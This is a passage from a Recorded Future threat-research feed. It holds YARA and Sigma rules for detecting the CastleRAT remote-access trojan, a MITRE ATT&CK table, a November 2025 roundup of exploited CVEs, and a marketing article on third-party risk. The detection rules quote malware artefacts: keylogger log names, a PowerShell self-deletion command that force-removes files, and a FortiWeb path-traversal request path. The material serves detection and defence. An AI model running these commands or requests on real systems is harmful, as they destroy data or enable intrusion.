        $fun5 = "rc4createkeyA("
        $fun6 = "EncryptDecryptBufA("
        $fun7 = "RecvTimeout("
        $fun8 = "Send("
        $fun9 = "Connect("
        $fun10 = "ThreadPing("
        $fun11 = "ThreadRecvTerminal("
        $fun12 = "ThreadTerminalSession("
        $fun13 = "ThreadUploadFile("
        $fun14 = "SelfDelete()" fullword
    condition:
        filesize &lt; 50KB and
        7 of ($cmd*) and
        10 of ($fun*)
}

rule MAL_CastleRAT_C {
    meta:
        author = "Insikt Group, Recorded Future"
        date = "2025-08-18"
        description = "Detection of the C variant of CastleRAT malware"
        version = "2.0"
        reference = "https://www.recordedfuture.com/ko/research/from-castleloader-to-castlerat-tag-150-advances-operations"
        reference = "https://www.ibm.com/think/x-force/dissecting-castlebot-maas-operation"
        reference = "https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview"
        hash = "1ff6ee23b4cd9ac90ee569067b9e649c76dafac234761706724ae0c1943e4a75"
        hash = "e6bcdf375649a7cbf092fcab65a24d832d8725d833e422e28dfa634498b00928"
        hash = "67cf6d5332078ff021865d5fef6dc61e90b89bc411d8344754247ccd194ff65b"
        hash = "963c012d56c62093d105ab5044517fdcce4ab826f7782b3e377932da1df6896d"
        hash = "60125159523c356d711ffa1076211359906e6283e25f75f4cf0f9dc8da6bf7b0"
        hash = "cf202498b85e6f0ae4dffae1a65acbfec78cc39fce71f831d45f916c7dedfa0c"
        malware = "CastleRAT"
        malware_id = "9WCga-"
        category = "MALWARE"
        actor = "TAG-150"
        actor_id = "9nk6DO"
    strings:
        $log_tag1 = "clipboardlog.txt" fullword wide
        $log_tag2 = "keylog.txt" fullword wide
        $wnd_class1 = "IsabellaWine" fullword wide
        $wnd_class2 = "camera!" fullword wide
        $log_fmt1 = "[%02d:%02d %02d.%02d.%02d] %ws" fullword wide
        $log_fmt2 = "[%02d:%02d %02d.%02d.%02d] " fullword wide
        $log_fmt3 = "[%02d.%02d.%02d %02d:%02d] " fullword wide
        $s1 = "(VPN)" wide ascii
        $s2 = "rundll32 \"C:\\Windows\\System32\\shell32.dll\" #61"  wide
        $s3 = "\"%ws\" -no-deelevate" fullword wide
        $s4 = "IsWindowVisible" fullword ascii
        $s5  = "UAC_InputIndicatorOverlayWnd" fullword wide
        $s6 = "www.ip-api.com" fullword wide
        $s7 = "MachineGuid" fullword wide
        $s8 = "line/?fields=" wide
        $s9 = "C:\\Windows\\System32\\cmd.exe" wide
        $s10  = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" fullword wide

     condition:
       uint16(0) == 0x5a4d and
       any of ($log_tag*) and
       any of ($wnd_class*) and
       any of ($log_fmt*) and
       all of ($s*)
}

rule MAL_CastleRAT_Shellcode_Loader {
    meta:
        author = "Insikt Group, Recorded Future"
        date = "2025-10-20"
        description = "Detection of a python based shellcode loader that runs CastleRAT malware"
        version = "1.0"
        reference = "https://www.recordedfuture.com/ko/research/from-castleloader-to-castlerat-tag-150-advances-operations"
        hash = "058d83fd8834246d6d2a2771e6e0aeb4d4ef8a6984cbe1133f3a569029a4b1f7"
        hash = "190e673787bfc6e8eeebccd64c8da61747d5be06f87d3aea879118ef1a9f4836"
        malware = "CastleRAT"
        actor = "TAG-150"
        actor_id = "9nk6DO"
        category = "MALWARE"
        malware_id = "9WCga-"
    strings:
        $s1 = "SHELL64_OFFSET = "
        $s2 = "SHELL32_OFFSET = "
        $s3 = "SHELLFUNC = WINFUNCTYPE"
        $s4 = "LoadPE_Shell"
        $s5 = "crt = WinDLL(\"msvcrt.dll\");"
        $s6 = "OPEN_EXISTING" fullword
        $s7 = ".VirtualProtect("
        $s8 = "offset"
        $s9 = "from ctypes"
    condition:
        filesize &lt; 50KB and $s9 at 0 and all of them
}
</code></pre>
            </div>
          </div>
        </div>
        <h2>Appendix N: CastleRAT Sigma Rules</h2>
        <div>
          <div>
            <div>
              <pre><code>title: CastleRAT C Variant Malware Log File Creation
id: 4d785ac8-17fe-4765-b427-9a31073ad1a7
status: stable
description: Detects CastleRAT C variant malware log file creation events. The log file is used to store output from the keylogger and clipboard stealer.
references:
  - https://tria.ge/250701-v6911aykv9
  - https://tria.ge/251101-r8f9xstjap
author: Insikt Group, Recorded Future
date: 2025-08-29
level: high
tags:
  - attack.t1608 # Stage Capabilities
  - attack.t1074.001 # Local Data Staging
  - attack.t1115 # Clipboard Data
  - attack.t1056.001 # Keylogging
logsource:
  product: windows
  category: file_event
detection:
  castlerat_logs:
    TargetFilename|endswith:
      - '\AppData\Local\Temp\MuuuuuhGer3'
      - '\AppData\Local\Temp\PluhhSuk3'
      - '\AppData\Local\Temp\AsdDsaHaha3'
      - '\AppData\Local\Temp\ChuChuka'
      - '\AppData\Local\Temp\GagikMaraguiSS'
      - '\AppData\Local\Temp\LowUshrSudujes'
      - '\AppData\Local\Temp\RarnuiKarta'
      - '\AppData\Local\Temp\GrazGraznii'
      - '\AppData\Local\Temp\GiveGvein3'
      - '\AppData\Local\Temp\BeruiowdgsouiHTR'
      - '\AppData\Local\Temp\GDSongdsgndohSDU'
      - '\AppData\Local\JohniiDepp'
      - '\AppData\Local\LuchiiSvet'
      - '\AppData\Local\HmmMaybe'
  condition: castlerat_logs
falsepositives:
  - Unlikely

title: CastleRAT Python Malware Self Deletion
id: 1050a0c4-1110-4b55-938c-0d27259ddd1e
status: stable
description: Detects the execution of powershell by the Python variant of CastleRAT malware to delete itself.
references:
  - https://tria.ge/250822-r3a6qaak2t
author: Insikt Group, Recorded Future
date: 2025-08-28
tags:
  - attack.t1070.004   # Indicator Removal: File Deletion
logsource:
    product: windows
    category: process_creation
detection:
    self_delete:
        CommandLine|endswith: 'powershell Start-Sleep -Seconds 4; Remove-Item -Path * -Force; exit'
    condition: self_delete
level: high
falsepositives:
  - Potential benign installer activity

title: CastleRAT C Malware Self Deletion
id: 79268bc8-3220-447d-bc7a-02199bed58e9
status: stable
description: Detects the execution of powershell by the C variant of CastleRAT malware to delete itself.
references:
  - https://tria.ge/251101-lh19hstqft/behavioral2
author: Insikt Group, Recorded Future
date: 2025-11-06
tags:
  - attack.t1070.004   # Indicator Removal: File Deletion
logsource:
    product: windows
    category: process_creation
detection:
    self_delete:
        CommandLine|endswith: 'powershell Start-Sleep -Seconds 3; Remove-Item -Path * -Force'
    condition: self_delete
level: high
falsepositives:
  - Potential benign installer activity
</code></pre>
            </div>
          </div>
        </div>
        <h2>Appendix O: MITRE ATT&amp;CK Techniques</h2>
        <div>
          <div>
            <div><strong>Tactic: Technique</strong></div>
            <div><strong>ATT&amp;CK Code</strong></div>
          </div>
          <div>
            <div><strong>Initial Access:</strong> Phishing</div>
            <div>T1566</div>
          </div>
          <div>
            <div><strong>Initial Access:</strong> Drive-by Compromise</div>
            <div>T1189</div>
          </div>
          <div>
            <div><strong>Execution:</strong> User Execution: Malicious File</div>
            <div>T1204.002</div>
          </div>
          <div>
            <div><strong>Execution:</strong> User Execution: Malicious Copy and Paste</div>
            <div>T1204.004</div>
          </div>
          <div>
            <div><strong>Execution:</strong> Command and Scripting Interpreter: PowerShell</div>
            <div>T1059.001</div>
          </div>
          <div>
            <div><strong>Execution:</strong> Command and Scripting Interpreter: AutoHotKey &amp; AutoIT</div>
            <div>T1059.010</div>
          </div>
          <div>
            <div><strong>Resource Development:</strong> Acquire Infrastructure: Domains</div>
            <div>T1583.001</div>
          </div>
          <div>
            <div><strong>Resource Development:</strong> Acquire Infrastructure: Virtual Private Server</div>
            <div>T1583.003</div>
          </div>
          <div>
            <div><strong>Resource Development:</strong> Acquire Infrastructure: Server</div>
            <div>T1583.004</div>
          </div>
          <div>
            <div><strong>Resource Development:</strong> Acquire Access</div>
            <div>T1650</div>
          </div>
          <div>
            <div><strong>Resource Development:</strong> Obtain Capabilities: Tool</div>
            <div>T1588.002</div>
          </div>
          <div>
            <div><strong>Resource Development:</strong> Compromise Accounts: Email Accounts</div>
            <div>T1586.002</div>
          </div>
          <div>
            <div><strong>Defense Evasion:</strong> Masquerading</div>
            <div>T1036</div>
          </div>
          <div>
            <div><strong>Command-and-Control:</strong> Proxy: External Proxy</div>
            <div>T1090.002</div>
          </div>
          <div>
            <div><strong>Command-and-Control:</strong> Application Layer Protocol: Web Protocols</div>
            <div>T1071.001</div>
          </div>
          <div>
            <div><strong>Command-and-Control:</strong> Ingress Tool Transfer</div>
            <div>T1105</div>
          </div>
          <div>
            <div><strong>Collection:</strong> Data from Local System</div>
            <div>T1005</div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_171fa690104f0a5274fe66bfe605332a13a3fc906.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[November 2025 CVE Landscape: 10 Critical Vulnerabilities Show 69% Drop from October]]></title>
            <link>https://www.recordedfuture.com/ko/blog/november-2025-cve-landscape</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/november-2025-cve-landscape</guid>
            <pubDate>Tue, 09 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[November 2025 CVE landscape: 10 exploited critical vulnerabilities, a 69% drop from October, and why Fortinet and Samsung flaws need urgent patching.]]></description>
            <content:encoded><![CDATA[
        <p>November 2025 saw a significant 69% decrease in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying <strong>10 vulnerabilities</strong> requiring immediate attention, <a href="https://www.recordedfuture.com/ko/blog/october-2025-cve-landscape">down from 32 in October</a>.</p>
        <p><strong>What security teams need to know:</strong></p>
        <ul>
          <li><strong>Fortinet leads concerns:</strong> Two critical FortiWeb vulnerabilities (CVE-2025-64446 and CVE-2025-58034) are under active exploitation</li>
          <li><strong>LANDFALL spyware campaign:</strong> Threat actors weaponized Samsung's image processing flaw (CVE-2025-21042) for zero-click Android attacks</li>
          <li><strong>Public exploits proliferate:</strong> Seven of ten vulnerabilities have public proof-of-concept code available</li>
          <li><strong>OS Command Injection and Out-of-bounds Write</strong> were tied as the most common weakness types</li>
        </ul>
        <p><strong>Bottom line:</strong> The reduced volume shouldn't signal reduced vigilance. November's vulnerabilities demonstrate that threat actors favored quality over quantity in their exploitation campaigns.</p>
        <h2>Quick Reference: November 2025 Vulnerability Table</h2>
        <p><em>All 10 vulnerabilities below were actively exploited in November 2025.</em></p>
        <div>
          <div>
            <div><strong>#</strong></div>
            <div><strong>Vulnerability</strong></div>
            <div><strong>Risk</strong><br /><strong>Score</strong></div>
            <div><strong>Affected Vendor/Product</strong></div>
            <div><strong>Vulnerability Type/Component</strong></div>
            <div><strong>Public PoC</strong></div>
          </div>
          <div>
            <div>1</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BAWo-07/overview">CVE-2025-12480</a></div>
            <div>99</div>
            <div>Gladinet Triofox</div>
            <div>CWE-284 (Improper Access Control)</div>
            <div>No</div>
          </div>
          <div>
            <div>2</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BAY-aVO/overview">CVE-2025-62215</a></div>
            <div>99</div>
            <div>Microsoft Windows 10 and 11; Microsoft Windows Server 2019, 2022, and 2025</div>
            <div>CWE-362 (Race Condition), CWE-415 (Double Free)</div>
            <div><a href="https://github.com/search?q=%22CVE-2025-62215%22&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>3</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BAgNrn4/overview">CVE-2025-64446</a></div>
            <div>99</div>
            <div>Fortinet FortiWeb</div>
            <div>CWE-23 (Relative Path Traversal)</div>
            <div><a href="https://github.com/search?q=CVE-2025-64446&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>4</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BAnoPpx/overview">CVE-2025-13223</a></div>
            <div>99</div>
            <div>Google Chrome</div>
            <div>CWE-843 (Type Confusion)</div>
            <div>No</div>
          </div>
          <div>
            <div>5</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BApQp8P/overview">CVE-2025-58034</a></div>
            <div>99</div>
            <div>Fortinet FortiWeb</div>
            <div>CWE-78 (OS Command Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2025-58034&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>6</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/_ob8BJ/overview">CVE-2025-61757</a></div>
            <div>99</div>
            <div>Oracle Identity Manager</div>
            <div>CWE-306 (Missing Authentication for Critical Function)</div>
            <div><a href="https://github.com/search?q=CVE-2025-61757&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>7</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/-R66PT/overview">CVE-2025-9242</a></div>
            <div>99</div>
            <div>WatchGuard Fireware OS</div>
            <div>CWE-787 (Out-of-bounds Write)</div>
            <div><a href="https://github.com/search?q=CVE-2025-9242&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>8</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/-HNHUv/overview">CVE-2025-21042</a></div>
            <div>99</div>
            <div>Samsung Mobile Devices</div>
            <div>CWE-787 (Out-of-bounds Write)</div>
            <div><a href="https://github.com/B1ack4sh/Blackash-CVE-2025-21042">Yes</a></div>
          </div>
          <div>
            <div>9</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/6VoCY0/overview">CVE-2025-48703</a></div>
            <div>99</div>
            <div>CentOS Web Panel</div>
            <div>CWE-78 (OS Command Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2025-48703&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>10</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/iwWgRF/overview">CVE-2021-26829</a></div>
            <div>99</div>
            <div>OpenPLC ScadaBR</div>
            <div>CWE-79 (Improper Neutralization of Input During Web Page Generation [Cross-site Scripting])</div>
            <div>No</div>
          </div>
        </div>
        <p><em><strong>Table 1:</strong></em> <em>List of vulnerabilities that were actively exploited in November based on Recorded Future data (Source: Recorded Future)</em></p>
        <h2>Key Trends: November 2025</h2>
        <h3>Vendors Most Affected</h3>
        <ul>
          <li><strong>Fortinet</strong> dominated with two critical FortiWeb vulnerabilities, both enabling remote exploitation</li>
          <li><strong>Microsoft</strong> faced a kernel-level race condition affecting all modern Windows versions</li>
          <li><strong>Samsung</strong> saw the weaponization of an image processing vulnerability for sophisticated mobile attacks</li>
          <li>Additional affected vendors: Gladinet, Google, Oracle, WatchGuard, CentOS, and Autonomy (OpenPLC)</li>
        </ul>
        <h3>Most Common Weakness Types</h3>
        <ul>
          <li><strong>CWE-78</strong> – OS Command Injection (tied for first)</li>
          <li><strong>CWE-787</strong> – Out-of-bounds Write (tied for first)</li>
          <li><strong>CWE-284</strong> – Improper Access Control</li>
          <li><strong>CWE-362</strong> – Race Condition</li>
          <li><strong>CWE-306</strong> – Missing Authentication for Critical Function</li>
        </ul>
        <h3>Threat Actor Activity</h3>
        <p><strong>LANDFALL Android spyware campaign</strong> marked November's most sophisticated operation:</p>
        <ul>
          <li>Exploited <strong>CVE-2025-21042</strong> for zero-click remote code execution on Samsung devices</li>
          <li>Targeted Middle Eastern countries (Iraq, Iran, Turkey, Morocco) with commercial-grade spyware</li>
          <li>Deployed via weaponized DNG image files through WhatsApp</li>
          <li>Achieved persistent device compromise without user interaction</li>
          <li>Demonstrated advanced anti-analysis and SELinux bypass capabilities</li>
        </ul>
        <h2>Priority Alert: Active Exploitation</h2>
        <p>These vulnerabilities demand immediate attention due to confirmed exploitation in the wild.</p>
        <h3>CVE-2025-64446 | Fortinet FortiWeb</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | CISA KEV: Added November 14, 2025</p>
        <p><strong>Why this matters:</strong> Unauthenticated attackers can bypass authentication entirely and create administrative accounts. With 4,768 exposed FortiWeb instances globally, this represents a critical internet-facing risk.</p>
        <p><strong>Affected versions:</strong> FortiWeb 8.0.0-8.0.1, 7.6.0-7.6.4, 7.4.0-7.4.9, 7.2.0-7.2.11, 7.0.0-7.0.11</p>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Apply Fortinet's security updates (8.0.2, 7.6.5, 7.4.10, 7.2.12, or 7.0.12)</li>
          <li>Monitor for POST requests to <code>/api/v2.0/cmd/system/admin%3F/../../../cgi-bin/fwbcgi</code></li>
          <li>Check for unauthorized admin accounts created since October 2025</li>
          <li>Review logs for Base64-encoded CGIINFO headers</li>
          <li>Disable HTTP/HTTPS on internet-facing interfaces if patching is delayed</li>
        </ul>
        <p><strong>Exposure:</strong> ~4,768 FortiWeb instances visible on Shodan (Netherlands, US, Germany, Italy, Peru)</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_13b330b3e13aad900440407bcd3dde599640b59e9.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="797" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em><a href="https://www.recordedfuture.com/ko/products/vulnerability-intelligence">Vulnerability Intelligence</a></em> <em>Card® for CVE-2025-64446 in Recorded Future (Source: Recorded Future)</em></div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1afc13c5574e9a8966347fe80012616de5d023fd2.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[5 Real-Word Third-Party Risk Examples]]></title>
            <link>https://www.recordedfuture.com/ko/blog/third-party-risk-examples</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/third-party-risk-examples</guid>
            <pubDate>Tue, 09 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Explore 5 third-party risk examples, from vendor data breaches to supply chain attacks and learn how third-party risk management can prevent cyberattacks.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li><strong>Static vendor checks fall short:</strong> Traditional, point-in-time third-party risk management practices (e.g. annual questionnaires) leave organizations blind to emerging vendor threats between audits. Continuous monitoring is now a must.</li>
          <li><strong>Five common risk scenarios:</strong> Supply chain attacks, widespread software vulnerabilities, hidden fourth-party dependencies, vendor credential theft, and vendor instability each illustrate how “trusting” vendors can lead to breaches or business disruptions.</li>
          <li><strong>Intelligence-driven defense:</strong> Recorded Future’s platform provides real-time visibility into your vendor ecosystem—from dark web credential leaks to fourth-party relationships—enabling proactive mitigation before incidents impact your organization.</li>
          <li><strong>From trust to verification:</strong> The solution is to move from static trust to continuous verification. By continuously assessing vendors’ cyber and business health (and even integrating intelligence into workflows like ServiceNow), security leaders can vastly strengthen their vendor risk management framework.</li>
        </ul>
        <h2>Your Vendor Ecosystem Is a Black Box: It’s Time to Turn on the Lights</h2>
        <p>For CISOs and risk leaders, the attack surface now goes far beyond the footprint of the business. It’s a sprawling web of SaaS vendors, software suppliers, MSPs, payment processors, logistics partners, and niche fourth parties your vendors rely on. Every connection expands risk—often outside direct visibility. In other words, your security may only be as strong as your weakest vendor or partner.</p>
        <p>Traditional third-party risk management (TPRM)—static security questionnaires and annual audits—cannot keep pace. They describe what a vendor claimed their security looked like months ago, not what it is right now. Meanwhile, the most damaging events (supply chain attacks, zero-day exploitation, credential resale, concentration failures) unfold in hours and days, not quarters.</p>
        <p>This gap between point-in-time paperwork and real-time risk is why third-party exposure has become a primary vector for catastrophic breaches and business outages.</p>
        <p>This article will highlight and analyze 5 real-world third-party risk examples. For each, we'll show why traditional methods fail and how continuous, real-time <a href="https://www.recordedfuture.com/ko/threat-intelligence-101/risk-assessment-management/third-party-risk-management">third-party risk management</a> and threat intelligence is the only effective prevention.</p>
        <h2>5 Third-Party Risk Examples and How to Prevent Them</h2>
        <p>Modern vendor risk comes in many forms. Let’s explore five common scenarios—and how proactive measures can stop them:</p>
        <h3>Type 1: The Software Supply Chain Attack</h3>
        <p><strong>The Scenario:</strong> One of the most damaging third-party risks is a software supply chain attack. This occurs when threat actors breach a trusted software vendor’s development environment and secretly inject malicious code into a legitimate, digitally signed software update. The tainted update, a “Trojan horse,” is then distributed to the vendor’s customers, giving the attacker access into thousands of networks at once.</p>
        <p><strong>Real-World Example:</strong> <a href="https://www.gao.gov/blog/solarwinds-cyberattack-demands-significant-federal-and-private-sector-response-infographic">The SolarWinds Orion breach</a> is a quintessential case. In 2020, nation-state hackers compromised SolarWinds’ build pipeline and inserted malware into an Orion software update. The malicious update, being validly signed, was pushed to around 18,000 customers, including numerous government agencies and Fortune 500 companies, who all gladly installed it, thereby granting the attackers insider access to their systems.</p>
        <p><strong>Why Traditional Methods Fail:</strong> A standard vendor security questionnaire or audit would never have caught this. SolarWinds had passed assessments and appeared reputable. The update itself was digitally signed and appeared “trusted” to antivirus scanners and other controls. In short, you cannot audit your way out of a risk that’s been inserted into a trusted product’s software supply chain.</p>
        <p><strong>The Intelligence-Led Solution:</strong> Preventing a supply chain attack means detecting subtle warning signs before the breach fully unfolds. Recorded Future’s platform continuously monitors for early indicators tied to your vendors. If threat actors known for targeting CI/CD pipelines start discussing or probing one of your software vendors, you’d know. If intelligence suggests a vendor’s code-signing certificate may be compromised, you’d get an alert. Armed with this foresight, you could elevate that vendor’s risk status, scrutinize their software updates more closely, and even hunt for indicators of compromise in your environment before the breach becomes public knowledge.</p>
        <h3>Type 2: The Widespread Third-Party Vulnerability</h3>
        <p><strong>The Scenario:</strong> A critical software vulnerability (often a zero-day) is discovered in a common component that many of your vendors use. It could be an open-source library, a popular IT tool, or a cloud service. You have no direct visibility that your suppliers rely on this component. Attackers quickly develop an exploit and start compromising organizations at scale via this flaw, long before most victims even realize they’re exposed through their third parties.</p>
        <p><strong>Real-World Example:</strong> The <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-158a">MOVEit Transfer zero-day</a> (exploited by the Cl0p ransomware group) and the <a href="https://www.cisa.gov/news-events/news/apache-log4j-vulnerability-guidance">Log4j “Log4Shell” vulnerability</a> are perfect examples of this risk. In the case of MOVEit, a single bug in a widely used file-transfer product led to the mass theft of data from thousands of companies, many of whom weren’t even direct customers of MOVEit, but their vendors were. Similarly, the Log4j flaw impacted countless businesses indirectly because software used by their contractors and providers included the vulnerable library.</p>
        <p><strong>Why Traditional Methods Fail:</strong> This is fundamentally a technology visibility problem. A point-in-time survey asking your vendors “Do you use MOVEit?” is too little, too late. By the time you send out a questionnaire and get a reply (if you get one at all), attackers may have already exploited the vulnerability and exfiltrated data. No organization can manually track every piece of software in their extended vendor ecosystem through periodic check-ins. In the MOVEit incident, many companies had no idea they were at risk until news of data breaches surfaced. Traditional vendor risk management simply isn’t designed to monitor technical exposure in real time.</p>
        <p><strong>The Intelligence-Led Solution:</strong> Defending against widespread vulnerabilities requires connecting two dots instantly: <a href="https://www.recordedfuture.com/ko/threat-intelligence-101/risk-assessment-management/third-party-risk-assessment">what’s vulnerable and who in your supply chain is using it</a>. This is where an intelligence platform shines. Recorded Future’s approach combines technical attack surface intelligence with real-time vulnerability tracking. It continuously scans the internet to map out the external-facing tech stack of your third parties. The moment a new critical vulnerability is disclosed, <a href="https://www.recordedfuture.com/ko/products/third-party-intelligence">Recorded Future’s intelligence</a> automatically checks which of your vendors are running that technology. You receive an immediate, prioritized alert such as: “CRITICAL: 15 of your third-party vendors are exposing servers running [the vulnerable software]. Prompt them to apply patches or mitigations immediately.”</p>
        <h3>Type 3: The Fourth-Party &amp; Concentration Risk</h3>
        <p><strong>The Scenario:</strong> Sometimes the biggest risk in your vendor ecosystem isn’t with your direct third parties, but with their key dependencies. A “fourth party” is a vendor of your vendor, and if one that many of your critical vendors rely on goes down, it can create a single point of failure. A single outage can cascade up the chain, disrupting operations even when direct vendors appear secure.</p>
        <p><strong>Real-World Example:</strong> The <a href="https://www.cisa.gov/news-events/news/kaseya-ransomware-attack-guidance-affected-msps-and-their-customers">2021 ransomware attack on Kaseya’s VSA remote monitoring and management platform</a> is a textbook case. Kaseya primarily served managed service providers (MSPs), who in turn delivered IT services to thousands of downstream customers. When attackers exploited Kaseya VSA, they were effectively able to push ransomware out through those MSPs to many organizations that had no direct relationship with Kaseya at all—they only “knew” their MSP. A single fourth-party dependency became the pivot point for a broad, multi-industry disruption.</p>
        <p><strong>Why Traditional Methods Fail:</strong> If you looked at each of your primary (third-party) vendors in isolation, they all might have passed your security reviews with flying colors. What the traditional assessment missed was that ten of those vendors all relied on the same subcontractor for a critical function, a critical audit blind spot. Most organizations only discovered their exposure to Kaseya after MSP-delivered systems were already encrypted. Without continuous visibility into your vendors’ vendors, this kind of concentration risk remains invisible until it’s too late.</p>
        <p><strong>The Intelligence-Led Solution:</strong> The only way to manage fourth-party and concentration risk is through continuous mapping of your vendors’ vendors, coupled with dynamic risk scoring. Recorded Future’s Third-Party Intelligence solution automatically identifies and maps these Nth-party relationships throughout your supply chain. In practice, this means if a critical fourth-party suffers a breach, you won’t be finding out via the news days later. Instead, your intelligence dashboard would immediately show that entity’s risk score spiking from, say, a modest 50 to a critical 99. This timely insight gives you a head start to activate business continuity and incident response plans. You immediately know exactly which of your vendors are impacted and can work to contain the fallout.</p>
        <h3>Type 4: The Vendor Credential Compromise</h3>
        <p><strong>The Scenario:</strong> Not all third-party attacks involve sophisticated malware or supply chain tampering. Sometimes hackers just log in through the front door. In this scenario, a threat actor steals valid credentials from one of your vendors and uses those to access your systems. Perhaps an employee at a smaller, “low-risk” vendor, like an HVAC contractor, falls victim to a phishing email or unknowingly runs info-stealer malware on their laptop. Their VPN login or application credentials to your network get quietly harvested and sold on the dark web. An attacker buys the login, bypasses your multi-factor authentication, and walks into your network posing as a legitimate third-party user.</p>
        <p><strong>Real-World Example:</strong> This tactic was at the heart of the high-profile <a href="https://www.bbrown.com/us/insight/a-look-back-at-the-mgm-and-caesars-incident/">2023 breaches of MGM Resorts and Caesars Entertainment</a>, where attackers initially gained access via a third-party IT support vendor’s compromised VPN credentials.</p>
        <p><strong>Why Traditional Methods Fail:</strong> A vendor security questionnaire cannot prevent an individual at a partner company from clicking a phishing link or using a weak password. Your vendor might have all the right policies on paper, but those policies are irrelevant the moment an attacker has a valid username and password in hand. Traditional TPRM programs are about vetting a vendor’s security controls and compliance, but they don’t provide real-time awareness of things like a password leak or dark web sale of access related to that vendor.</p>
        <p><strong>The Intelligence-Led Solution:</strong> The key to stopping a credential-based breach is catching those compromised credentials before they are used against you. This calls for continuous identity-centric intelligence. Recorded Future’s Third-Party Intelligence module includes automated monitoring of a wide range of sources, from dark web forums to infostealer logs and criminal marketplaces, specifically watching for any mention of your organization’s partners and their accounts. The moment a set of credentials associated with one of your vendors appears in an illicit context, you receive a high-priority alert. Your team can immediately revoke or reset that vendor account and investigate the extent of access. This is the definition of proactive defense: you’re effectively shutting the door on the attacker before they can walk through it.</p>
        <h3>Type 5: The Operational &amp; Financial Instability Risk</h3>
        <p><strong>The Scenario:</strong> Sometimes the greatest third-party risk is a vendor’s operational or financial collapse. Consider a scenario where a critical vendor suddenly encounters a non-cyber crisis like bankruptcy, a major lawsuit or regulatory sanction, a natural disaster, or even a geopolitical event that halts their business. From your security team’s perspective everything looked fine, but virtually overnight this partner’s failure threatens to grind your business to a halt.</p>
        <p><strong>Real-World Example:</strong> A headline-grabbing case occurred with the <a href="https://www.law.uw.edu/news-events/news/2023/svb-collapse">sudden collapse of Silicon Valley Bank (SVB)</a> in March 2023. SVB wasn’t attacked by hackers; it suffered a bank run and shut down in a matter of days. Companies that used SVB as a banking partner or for credit found themselves unable to access funds or process payroll, creating a cascade of operational and financial issues.</p>
        <p><strong>Why Traditional Methods Fail:</strong> A standard security questionnaire or compliance-focused vendor review is utterly blind to this category of risk. Your CISO’s third-party risk process likely doesn’t include reviewing a vendor’s financial statements or monitoring news about their executives’ legal troubles—nor should it, in a traditional model, since those are outside the classic IT security scope. As a result, organizations were caught off-guard by SVB’s collapse. A vendor that looked perfectly green from a security control standpoint turned out to be a huge business continuity threat. This kind of event exposes an “edge case” risk that isn’t an edge case at all: vendors can introduce strategic and financial risks that security teams and vendor managers often aren’t tracking.</p>
        <p><strong>The Intelligence-Led Solution:</strong> Truly comprehensive third-party risk management means monitoring all-source intelligence on your vendors, not just cyber indicators. Recorded Future’s Third-Party Intelligence platform is built to ingest and analyze a broad spectrum of data about companies. This includes real-time monitoring of global news media, credit ratings and financial filings, changes in executive leadership, legal filings, sanctions lists, regulatory watchlists, and more. By defining “risk” holistically, the platform can alert you to significant non-cyber events that may impact your vendors. These signals give your security, risk, and procurement teams time to react, whether that means activating contingency plans, finding alternate suppliers, or engaging leadership to address the issue.</p>
        <h2>The Solution: Move from “Trust” to “Continuous Verification”</h2>
        <p>The five examples share a theme: “trust” is not a control. Vendor attestations and annual audits don’t capture rapidly changing third-party conditions—exploits, credentials, dependencies, and financial shocks. To answer why third-party risk management is important: it’s no longer a “vendor” problem. It’s your attack surface, your data, and your reputation on the line.</p>
        <p>This is why security leaders are shifting from a trust-but-verify model to a <a href="https://www.recordedfuture.com/ko/threat-intelligence-101/risk-assessment-management/vendor-risk-management-framework">model of continuous verification</a>, replacing blind trust with live intelligence.</p>
        <p>Moving to continuous verification means supplementing or replacing periodic vendor check-ins with real-time intelligence and automation. This is where Recorded Future’s approach comes in. Recorded Future acts as a “risk radar” that’s always on, giving you a 360-degree, real-time view of your third-party ecosystem. It uniquely integrates multiple intelligence streams—threat intelligence, attack surface intelligence, and third-party risk intelligence—into one platform.</p>
        <ul>
          <li>Know which CVEs matter today across your ecosystem with <a href="https://www.recordedfuture.com/ko/products/vulnerability-intelligence">Vulnerability Intelligence</a> and exploit-in-the-wild context.</li>
